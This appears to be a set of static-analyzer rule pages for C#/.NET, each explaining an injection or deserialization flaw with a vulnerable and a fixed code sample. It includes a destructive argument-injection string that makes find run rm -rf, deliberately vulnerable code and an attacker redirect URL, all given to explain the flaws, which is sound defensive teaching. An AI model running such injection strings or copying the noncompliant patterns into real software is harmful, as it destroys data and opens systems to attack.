In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate their privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in .NET

Code examples

The following code is vulnerable to deserialization attacks because it deserializes HTTP data without validating it first.

Noncompliant code example

public class Example : Controller
{
    [HttpPost]
    public ActionResult Deserialize(HttpPostedFileBase inputFile)
    {
        ExpectedType expectedObject = null;
        var formatter               = new BinaryFormatter();
        expectedObject              = (ExpectedType)formatter.Deserialize(inputFile.InputStream); // Noncompliant
        return Content(expectedObject.ToString());
    }
}

Compliant solution

public class Example : Controller
{
    [HttpPost]
    public ActionResult Deserialize(HttpPostedFileBase inputFile)
    {
        ExpectedType expectedObject = null;
        JsonSerializer serializer   = new JsonSerializer(typeof(ExpectedType));
        expectedObject              = (ExpectedType)serializer.Deserialize(inputFile.InputStream);
        return Content(expectedObject.ToString());
    }
}

How does this work?

Allowing users to provide data for deserialization generally creates more problems than it solves.

Anything that can be done through deserialization can generally be done with more secure data structures.
Therefore, our first suggestion is to avoid deserialization in the first place.

However, if deserialization mechanisms are valid in your context, here are some security suggestions.

More secure serialization methods

Some more secure serialization methods reduce the risk of security breaches, although not definitively.

A complete object serializer is probably unnecessary if you only need to receive primitive data (integers, strings, booleans, and so on).
In this case, formats such as JSON and XML protect the application from deserialization attacks by default.

For more complex objects, the next step is to control which class fields are exposed by creating class-specific serialization methods.
The most common method is to use the Data Transfer Object (DTO) pattern or Google Protocol Buffers (Protobuf). After you define the Protobuf data structure, the Protobuf compiler generates class files that handle operations such as serializing and deserializing data.
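To illustrate the DTO approach, the sketch below (the type and field names are hypothetical) defines a record whose deserialization can only ever populate two primitive fields. By default, System.Text.Json drops payload members that have no matching constructor parameter or property on the target type:

```csharp
using System;
using System.Text.Json;

// Hypothetical DTO: deserialization can only populate these two primitive
// fields, regardless of what else the incoming payload contains.
public record ProductOrderDto(string ProductId, int Quantity);

public class DtoExample
{
    public static void Main()
    {
        // The payload smuggles an unexpected "IsAdmin" member.
        string payload = @"{""ProductId"":""A42"",""Quantity"":2,""IsAdmin"":true}";

        // System.Text.Json silently ignores the unmapped member.
        ProductOrderDto dto = JsonSerializer.Deserialize<ProductOrderDto>(payload);

        Console.WriteLine($"{dto.ProductId} x{dto.Quantity}"); // A42 x2
    }
}
```

Because the DTO carries only data and no behavior, a forged payload has nothing to hijack.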

Integrity check

Message authentication codes (MAC) can be used to prevent tampering with serialized data that is meant to be stored outside the application server:

  • On the server-side, when serializing an object, compute a MAC of the result and append it to the serialized object string.
  • When the serialized value is submitted back, verify the serialization string MAC on the server side before deserialization.

Depending on the situation, two MAC computation modes can be used.

If the same application will be responsible for the MAC computing and validation, a symmetric signature algorithm can be used. In that case, HMAC should be preferred, with a strong underlying hash algorithm such as SHA-256.

If multiple parties have to validate the serialized data, an asymmetric signature algorithm should be used. This reduces the chances of a signing secret being leaked. In that case, the RSASSA-PSS algorithm can be used.

Note: Be sure to store the signing secret securely.
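The integrity-check flow described above can be sketched with HMAC-SHA256 as follows. The helper names and the signed-payload format (serialized string, a "." separator, then the hex-encoded MAC) are illustrative assumptions, not a fixed standard; the snippet assumes .NET 6 or later:

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

public static class SerializedPayloadSigner
{
    // Server side: append a hex-encoded HMAC-SHA256 of the serialized object.
    public static string Sign(string serialized, byte[] key)
    {
        using var hmac = new HMACSHA256(key);
        byte[] mac = hmac.ComputeHash(Encoding.UTF8.GetBytes(serialized));
        return serialized + "." + Convert.ToHexString(mac);
    }

    // Before deserialization: recompute the MAC and compare in constant time.
    public static bool Verify(string signed, byte[] key)
    {
        int dot = signed.LastIndexOf('.');
        if (dot < 0) return false;
        string recomputed = Sign(signed.Substring(0, dot), key);
        return CryptographicOperations.FixedTimeEquals(
            Encoding.UTF8.GetBytes(recomputed),
            Encoding.UTF8.GetBytes(signed));
    }

    public static void Main()
    {
        byte[] key = RandomNumberGenerator.GetBytes(32); // store this securely
        string signed = Sign("{\"qty\":1}", key);
        Console.WriteLine(Verify(signed, key));                   // True
        Console.WriteLine(Verify(signed.Replace("1", "9"), key)); // False
    }
}
```

Any tampering with the serialized part invalidates the MAC, so the payload is rejected before it ever reaches a deserializer.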

Pre-Approved classes

As a last resort, create a list of approved and safe classes that the application should be able to deserialize.
If the untrusted class does not match an entry in this list, it should be rejected because it is considered unsafe.

Note: Untrusted classes should be filtered out during deserialization, not after.
Depending on the language or framework, this should be possible by overriding the serialization process or using native capabilities to restrict type deserialization.

In the code samples, a pre-approved class is used natively by JsonSerializer to validate the class during deserialization. XmlSerializer also provides this capability.
Note: The pre-approved classes should not be able to tamper with the application’s inner workings.

The following native types are considered unsafe because they do not provide these capabilities:

  • BinaryFormatter
  • SoapFormatter
  • NetDataContractSerializer
  • LosFormatter
  • ObjectStateFormatter

Resources

Standards

roslyn.sonaranalyzer.security.cs:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user into browsing a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to a domain under the attacker’s control.

Tricking users into sending the malicious HTTP request is usually the main task of exploiting an open redirection. Often, it requires the attacker to build a credible pretext to avoid arousing the victim’s suspicion.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of their choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker-controlled website mirroring the interface of a web application the user trusts. Because the application looks the same and the clicked hyperlink appears trustworthy, the user struggles to identify that they are browsing a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker-controlled website that serves malware. As with domain mirroring, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that leads to the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in ASP.NET

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

using System.Web;
using System.Web.Mvc;

public class ExampleController : Controller
{
    [HttpGet]
    public void Redirect(string url)
    {
        Response.Redirect(url);
    }
}

Compliant solution

using System.Web;
using System.Web.Mvc;

public class ExampleController : Controller
{
    private readonly string[] allowedUrls = { "/", "/login", "/logout" };

    [HttpGet]
    public void Redirect(string url)
    {
        if (allowedUrls.Contains(url))
        {
            Response.Redirect(url);
        }
    }
}

How does this work?

Built-in framework methods should be preferred as, more often than not, these provide additional security mechanisms. Usually, these built-in methods are engineered for internal page redirections. Thus, they might not be the solution for the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com"), or an equivalent with the regex ^https://example\.com.*, can be exploited with the URL https://example.com.malicious.io. The practice of registering domains that maliciously resemble existing ones is widespread and is called cybersquatting.
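The pitfall can be reproduced in a few lines (the trusted host below is illustrative); only the variant whose prefix ends with a path separator rejects the cybersquatted domain:

```csharp
using System;

public class RedirectValidator
{
    // Broken: any URL that merely begins with the trusted authority passes.
    public static bool IsTrustedBroken(string url) =>
        url.StartsWith("https://example.com");

    // Fixed: the terminating '/' pins the end of the authority component.
    public static bool IsTrustedFixed(string url) =>
        url.StartsWith("https://example.com/");

    public static void Main()
    {
        string evil = "https://example.com.malicious.io/phish";
        Console.WriteLine(IsTrustedBroken(evil)); // True  (bypass)
        Console.WriteLine(IsTrustedFixed(evil));  // False (rejected)
    }
}
```

An even more robust option is to parse the URL with System.Uri and compare its Host property against an allow-list instead of doing string prefix checks.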

Resources

Standards

roslyn.sonaranalyzer.security.cs:S2078

Why is this an issue?

LDAP injections occur in an application when the application retrieves untrusted data and inserts it into an LDAP query without sanitizing it first.

An LDAP injection can be either basic or blind, depending on whether the data fetched from the server is directly returned in the web application’s response.
The absence of a visible response to the malicious request is not a barrier to exploitation, so blind injections must be treated the same way as basic LDAP injections.

What is the potential impact?

In the context of a web application vulnerable to LDAP injection: after discovering the injection point, attackers insert data into the vulnerable field to execute malicious LDAP commands.

The impact of this vulnerability depends on how vital LDAP servers are to the organization.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data leakage or corruption

In typical scenarios where systems perform innocuous LDAP operations to find users or create inventories, an LDAP injection could result in data leakage or corruption.

Privilege escalation

A malicious LDAP query could allow an attacker to impersonate a low-privileged user or an administrator in scenarios where systems perform authorization checks or authentication.

Attackers can use this vulnerability to gain multiple footholds in a target organization by collecting authentication bypasses.

How to fix it in .NET

Code examples

The following noncompliant code is vulnerable to LDAP injections because untrusted data is concatenated in an LDAP query without prior validation.

Noncompliant code example

public class ExampleController : Controller
{
    public IActionResult Authenticate(string user, string pass)
    {
        DirectoryEntry directory  = new DirectoryEntry("LDAP://ou=system");
        DirectorySearcher search  = new DirectorySearcher(directory);

        search.Filter = "(&(uid=" + user + ")(userPassword=" + pass + "))";

        return Json(search.FindOne() != null);
    }
}

Compliant solution

public class ExampleController : Controller
{
    public IActionResult Authenticate(string user, string pass)
    {
        // restrict the username and password to letters only
        if (!Regex.IsMatch(user, "^[a-zA-Z]+$") || !Regex.IsMatch(pass, "^[a-zA-Z]+$"))
        {
            return BadRequest();
        }

        DirectoryEntry directory  = new DirectoryEntry("LDAP://ou=system");
        DirectorySearcher search  = new DirectorySearcher(directory);

        search.Filter = "(&(uid=" + user + ")(userPassword=" + pass + "))";

        return Json(search.FindOne() != null);
    }
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

For LDAP injection, the cleanest way to do so is to use parameterized queries, if they are available for your use case.

Another approach is to sanitize the input before using it in an LDAP query. Input sanitization should be primarily done using native libraries.

Alternatively, validation can be implemented using an allowlist approach by creating a list of authorized and secure strings you want the application to use in a query. If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must sanitize and validate on the server side, not on client-side front-ends.

The most fundamental security mechanism is the restriction of LDAP metacharacters.

For Distinguished Names (DN), special characters that need to be escaped include:

  • \
  • #
  • +
  • <
  • >
  • ,
  • ;
  • "
  • =

For Search Filters, special characters that need to be escaped include:

  • *
  • (
  • )
  • \
  • null

In the compliant solution example, a validation mechanism is applied to untrusted input to ensure it is strictly composed of alphabetic characters.
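If strictly alphabetic validation is too restrictive for a use case, the filter metacharacters listed above can be escaped instead. The sketch below (the helper name is hypothetical) follows the RFC 4515 convention of replacing each search-filter metacharacter with a backslash followed by its two-digit hex code:

```csharp
using System;
using System.Text;

public static class LdapFilterEscaper
{
    // Escapes the five search-filter metacharacters per RFC 4515.
    public static string Escape(string value)
    {
        var sb = new StringBuilder();
        foreach (char c in value)
        {
            switch (c)
            {
                case '*':  sb.Append(@"\2a"); break;
                case '(':  sb.Append(@"\28"); break;
                case ')':  sb.Append(@"\29"); break;
                case '\\': sb.Append(@"\5c"); break;
                case '\0': sb.Append(@"\00"); break;
                default:   sb.Append(c);      break;
            }
        }
        return sb.ToString();
    }

    public static void Main()
    {
        // An injection attempt such as "*)(uid=*" is neutralized:
        Console.WriteLine(Escape("*)(uid=*")); // \2a\29\28uid=\2a
    }
}
```

With the metacharacters escaped, untrusted input can no longer terminate or extend the filter expression it is embedded in.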

Resources

Standards

roslyn.sonaranalyzer.security.cs:S5883

Why is this an issue?

OS command argument injections occur when applications allow the execution of operating system commands from untrusted data, but the untrusted data is limited to the arguments.
It is not possible to directly inject arbitrary commands that compromise the underlying operating system, but the behavior of the executed command can still be influenced in a way that expands access, for example by triggering the execution of arbitrary commands. The security of the application therefore depends on the behavior of the program being executed.

What is the potential impact?

An attacker exploiting an arguments injection vulnerability will be able to add arbitrary arguments to a system binary call. Depending on the command the arguments are added to, this might lead to arbitrary command execution.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in .NET

Code examples

The following code uses the find command and expects the user to enter the name of a file to find on the system.

It is vulnerable to arguments injection because untrusted data is inserted directly into the arguments of a process call without sanitization.
The application assumes that incoming data always consists of a specific range of characters and ignores that some inputs can introduce dangerous options, such as find’s -exec argument, which executes arbitrary commands.

In this particular case, an attacker may remove files in /some/folder with the following string:

'*' -exec rm -rf {} \;

Noncompliant code example

public class ExampleController : Controller
{
    public void Run(string args)
    {
        Process p             = new Process();
        p.StartInfo.FileName  = "/usr/bin/find";
        p.StartInfo.Arguments = "/some/folder -iname " + args;
        p.Start();
    }
}

Compliant solution

public class ExampleController : Controller
{
    public void Run(string args)
    {
        Process p            = new Process();
        p.StartInfo.FileName = "/usr/bin/find";
        p.StartInfo.ArgumentList.Add("/some/folder");
        p.StartInfo.ArgumentList.Add("-iname");
        p.StartInfo.ArgumentList.Add(args);
        p.Start();
    }
}

How does this work?

Allowing users to insert data in operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our suggestion is to avoid using OS commands in the first place.

Here, ArgumentList takes care of escaping each passed argument and internally creates a single, correctly quoted string that is given to the operating system when System.Diagnostics.Process.Start() is called.

Resources

Documentation

Standards

roslyn.sonaranalyzer.security.cs:S6641

Database connection strings control how an application connects to a database. They include information such as the location of the database, how to authenticate with the database, and how the connection should be secured.

The insertion of user-supplied values into a connection string can allow external control of these database connections.

Why is this an issue?

Connection strings contain a series of parameters that are structured as key/value pairs, similar to key1=value1;key2=value2.

If an attacker can control values that are inserted into the connection string, they may be able to insert additional parameters. These additional parameters can override values that were supplied earlier in the connection string.
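This override behavior can be observed with the framework’s own DbConnectionStringBuilder, which, like most connection string parsers, keeps the last occurrence of a duplicated key. The server address and the injected value below are made up for illustration:

```csharp
using System;
using System.Data.Common;

public class ConnectionStringInjection
{
    public static void Main()
    {
        // A hypothetical attacker submits a "password" that ends with an
        // injected parameter; the later duplicate key silently wins.
        string userPassword = "secret;Encrypt=false";

        var builder = new DbConnectionStringBuilder();
        builder.ConnectionString =
            "Server=10.0.0.101;Encrypt=true;Password=" + userPassword;

        Console.WriteLine(builder["Encrypt"]);  // false  (overridden)
        Console.WriteLine(builder["Password"]); // secret
    }
}
```

The injected Encrypt=false overrides the value set by the application, which is exactly the class of attack this rule targets.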

What is the potential impact?

An attacker can use specially-crafted values to change how the database connection is made. These values can add new parameters to the connection string, or can override parameters that had already been specified.

Escalation of privilege

Some database servers allow authentication via an OS user account instead of a username and password. The database connection is authenticated as the user running the application. When this authentication mode is used, any username or password in the connection string is ignored.

If an attacker can force the use of this authentication mode, the connection will be made as the user that the web application is running under. This will often be the LocalSystem or NetworkService account on Windows. Such accounts are often given a high level of privileges on the database server.

Credential theft

If an attacker can change the database server in the connection string, they can have the web application connect to a server that they control. The web application will then authenticate with that server, allowing those credentials to be stolen.

Bypassing data validation

Many web applications implicitly trust data that’s stored in the database. The data is validated before it is stored, so no additional validation is performed when that data is loaded.

If an attacker can change the database server in the connection string, they can have the web application connect to a database server that they control. Invalid data in this database could be passed to other services or systems, or could be used to trigger other bugs and logic flaws in the web application.

Network traffic sniffing

The connection string can control how the connection to the database server is secured. For example, it can control whether connections to Microsoft SQL Server use transport layer security (TLS).

If an attacker can disable these network security measures and they have some way to monitor traffic between the web server and the database server, they will be able to see all information that’s written to and read from the database.

How to fix it in .NET

Microsoft’s database connection libraries typically provide a connection string builder class. These classes provide methods and properties that safely set parameter values.

Connection string builders will only protect you if you use these methods and properties to set parameter values. They will not help if you are using them to modify a connection string where user-supplied values have already been added.

If no connection string builder is available, user-supplied values must either be validated to ensure that they’re not malicious, or must be properly quoted so that they cannot interfere with other connection string parameters.

Code examples

Noncompliant code example

public string ConnectionString { get; set; } = "Server=10.0.0.101;Database=CustomerData";

public SqlConnection ConnectToDatabase(HttpRequest request)
{
    string connectionString = string.Format("{0};User ID={1};Password={2}",
        ConnectionString,
        request.Form["username"],
        request.Form["password"]);

    SqlConnection connection = new SqlConnection();
    connection.ConnectionString = connectionString; // Noncompliant
    connection.Open();
    return connection;
}

Compliant solution

public string ConnectionString { get; set; } = "Server=10.0.0.101;Database=CustomerData";

public SqlConnection ConnectToDatabase(HttpRequest request)
{
    SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(ConnectionString);
    builder.UserID = request.Form["username"];
    builder.Password = request.Form["password"];

    SqlConnection connection = new SqlConnection();
    connection.ConnectionString = builder.ConnectionString;
    connection.Open();
    return connection;
}

How does this work?

Connection string builders will ensure that values are correctly sanitized when adding them to the connection string.

Resources

Documentation

Conference presentations

Standards

roslyn.sonaranalyzer.security.cs:S5145

Why is this an issue?

Log injection occurs when an application fails to sanitize untrusted data used for logging.

An attacker can forge log content to prevent an organization from being able to trace back malicious activities.

What is the potential impact?

If an attacker can insert arbitrary data into a log file, the integrity of the chain of events being recorded can be compromised.
This frequently occurs because attackers can inject the log entry separator of the logger framework, commonly newlines, and thus insert artificial log entries.
Other attacks requiring only field pollution could also occur, such as cross-site scripting (XSS) or code injection (for example, Log4Shell), if the logged data is fed to other application components that may interpret the injected data differently.

The focus of this rule is newline character replacement.

Log Forging

An attacker who can create independent log entries by injecting log entry separators can insert bogus data into a log file to conceal their malicious activities. This makes it harder for an incident response team to trace the origin of the breach, as the indicators of compromise (IoCs) lead to fake application events.

How to fix it in ASP.NET

Code examples

The following code is vulnerable to log injection as it constructs log entries using untrusted data. An attacker can leverage this to manipulate the chain of events being recorded.

Noncompliant code example

using System.Web;
using System.Web.Mvc;

public class ExampleController : Controller
{
    private static readonly log4net.ILog _logger = log4net.LogManager.GetLogger(System.Reflection.MethodBase.GetCurrentMethod().DeclaringType);

    [HttpGet]
    public void Log(string data)
    {
        if (data != null)
        {
            _logger.Info("Log: " + data); // Noncompliant
        }
    }
}

Compliant solution

using System.Web;
using System.Web.Mvc;

public class ExampleController : Controller
{
    private static readonly log4net.ILog _logger = log4net.LogManager.GetLogger(System.Reflection.MethodBase.GetCurrentMethod().DeclaringType);

    [HttpGet]
    public void Log(string data)
    {
        if (data != null)
        {
            data = data.Replace('\n', '_').Replace('\r', '_');
            _logger.Info("Log: " + data);
        }
    }
}

How does this work?

Data used for logging should be content-restricted and typed. This can be done by validating the data content or sanitizing it.
Validation and sanitization mainly revolve around preventing carriage return (CR) and line feed (LF) characters. However, further actions could be required based on the application context and the logged data usage.

Resources

Standards

roslyn.sonaranalyzer.security.cs:S5167

This rule is deprecated; use S5122, S5146, S6287 instead.

Why is this an issue?

User-provided data, such as URL parameters, POST data payloads, or cookies, should always be considered untrusted and tainted. Applications that construct HTTP response headers from tainted data could allow attackers to change security-sensitive headers, such as Cross-Origin Resource Sharing headers.

Web application frameworks and servers might also allow attackers to inject newline characters into headers to craft malformed HTTP responses. In this case, the application would be vulnerable to a larger range of attacks, such as HTTP Response Splitting/Smuggling. Modern web application frameworks mitigate this type of attack by default most of the time, but there might be rare cases where older versions are still vulnerable.

As a best practice, applications that use user-provided data to construct the response header should always validate the data first. Validation should be based on a whitelist.

Noncompliant code example

string value = Request.QueryString["value"];
Response.AddHeader("X-Header", value); // Noncompliant

Compliant solution

string value = Request.QueryString["value"];
// Allow only alphanumeric characters
if (value == null || !Regex.IsMatch(value, "^[a-zA-Z0-9]+$"))
{
  throw new Exception("Invalid value");
}
Response.AddHeader("X-Header", value);

Resources

roslyn.sonaranalyzer.security.cs:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in .NET

Code examples

The following code is vulnerable to command injection because it uses untrusted input to set up a new process. Therefore, an attacker can execute an arbitrary program that is installed on the system.

Noncompliant code example

public class ExampleController : Controller
{
    public void Run(string binary)
    {
        Process p = new Process();
        p.StartInfo.FileName = binary;
        p.Start();
    }
}

Compliant solution

public class ExampleController : Controller
{
    public void Run(string binary)
    {
        if (binary.Equals("/usr/bin/ls") || binary.Equals("/usr/bin/cat"))
        {
            // only ls and cat commands are authorized
            Process p = new Process();
            p.StartInfo.FileName = binary;
            p.Start();
        }
    }
}

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple ones to avoid ReDoS attacks. For example, you can accept only a specific set of executables by using ^/bin/(ls|pwd|grep)$.
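The pre-approved list described above can be sketched with an anchored regex; the three binaries are only examples:

```csharp
using System;
using System.Text.RegularExpressions;

public class CommandAllowlist
{
    // Anchored (^...$) and deliberately simple, so it cannot be bypassed
    // with prefixes or suffixes and carries no ReDoS risk.
    private static readonly Regex Allowed = new Regex(@"^/bin/(ls|pwd|grep)$");

    public static bool IsAllowed(string binary) => Allowed.IsMatch(binary);

    public static void Main()
    {
        Console.WriteLine(IsAllowed("/bin/ls"));             // True
        Console.WriteLine(IsAllowed("/bin/ls -la; rm -rf")); // False
    }
}
```

Anything that is not an exact, absolute match against the allow-list is rejected before a process is ever started.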

Important note: The application must do validation on the server side, not on client-side front-ends.

Neutralize special characters

If the application needs to execute complex commands that cannot be restricted with pre-approved lists, the cleanest approach is to use dedicated sanitization components, such as System.Diagnostics.ProcessStartInfo.

This component helps you neutralize common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • `
  • \
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options and argument delimiters are neutralized.
Argument delimiters include ', - and spaces.

For example, the UNIX find command supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since version 2.24.

Here, using ProcessStartInfo’s ArgumentList helps escape the passed arguments and internally creates a single string that is given to the operating system when System.Diagnostics.Process.Start() is called.

Resources

Documentation

Standards

roslyn.sonaranalyzer.security.cs:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in .NET

Code examples

The following code is vulnerable to arbitrary code execution because it compiles and runs HTTP data.

Noncompliant code example

using System.CodeDom.Compiler;

public class ExampleController : Controller
{
    public void Run(string message)
    {
        const string code = @"
            using System;
            public class MyClass
            {
                public void MyMethod()
                {
                    Console.WriteLine(""" + message + @""");
                }
            }
        ";

        var provider = CodeDomProvider.CreateProvider("CSharp");
        var compilerParameters = new CompilerParameters { ReferencedAssemblies = { "System.dll", "System.Runtime.dll" } };
        var compilerResults = provider.CompileAssemblyFromSource(compilerParameters, code);
        object myInstance = compilerResults.CompiledAssembly.CreateInstance("MyClass");
        myInstance.GetType().GetMethod("MyMethod").Invoke(myInstance, new object[0]);
    }
}

Compliant solution

using System.CodeDom.Compiler;

public class ExampleController : Controller
{
    public void Run(string message)
    {
        const string code = @"
            using System;
            public class MyClass
            {
                public void MyMethod(string input)
                {
                    Console.WriteLine(input);
                }
            }
        ";

        var provider = CodeDomProvider.CreateProvider("CSharp");
        var compilerParameters = new CompilerParameters { ReferencedAssemblies = { "System.dll", "System.Runtime.dll" } };
        var compilerResults = provider.CompileAssemblyFromSource(compilerParameters, code);
        object myInstance = compilerResults.CompiledAssembly.CreateInstance("MyClass");
        myInstance.GetType().GetMethod("MyMethod").Invoke(myInstance, new object[]{ message }); // Pass message to dynamic method
    }
}

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be used as data in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to pass only the name of the untrusted parameter to the dynamic code, rather than expanding its value into it. The dynamic code can then safely access the untrusted parameter's content and perform the processing.

The compliant code example uses such an approach.

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.
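Both approaches can be sketched as follows. This is a minimal illustration only; the class name, the accepted operation names, and the identifier mapping are all hypothetical:

```csharp
using System;
using System.Collections.Generic;

public static class DynamicCodeGuard
{
    // Allow list: only these operation names may appear in dynamic code.
    private static readonly HashSet<string> AllowedOperations =
        new HashSet<string>(StringComparer.Ordinal) { "Sum", "Average", "Count" };

    public static string ValidateOperation(string untrusted)
    {
        // Reject anything not explicitly listed; raise an error otherwise.
        if (!AllowedOperations.Contains(untrusted))
            throw new ArgumentException("Operation not allowed: " + untrusted);
        return untrusted;
    }

    // Identifier binding: users send an opaque identifier, never the value itself.
    private static readonly Dictionary<string, string> OperationById =
        new Dictionary<string, string> { ["1"] = "Sum", ["2"] = "Average" };

    public static string ResolveOperation(string id) =>
        OperationById.TryGetValue(id, out var op)
            ? op
            : throw new ArgumentException("Unknown operation id: " + id);
}
```

With the identifier-binding variant, an attacker can only choose among the pre-approved values, since arbitrary input never reaches the dynamic code.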

Resources

Articles & blog posts

Standards

roslyn.sonaranalyzer.security.cs:S6639

Memory allocation injections occur when an application computes the size of a piece of memory to allocate from an untrusted source. In such a case, an attacker could make the application unwillingly consume a significant amount of memory by forcing a large allocation size.

Why is this an issue?

By repeatedly requesting a feature that consumes a lot of memory, attackers can constantly occupy a significant part of the hosting server's memory. Depending on the application's deployment architecture, the hosting server's resources, and the attackers' capabilities, this can exhaust the server's available memory.

What is the potential impact?

A server that faces a memory exhaustion situation can become unstable. The exact impact will depend on how the affected application is deployed and how well the hosting server configuration is hardened.

In the worst case, when the application is deployed in an uncontained environment, directly on its host system, the memory exhaustion will affect the whole hosting server. The server’s operating system might start killing arbitrary memory-intensive processes, including the main application or other sensitive ones. This will result in a general operating failure, also known as a Denial of Service (DoS).

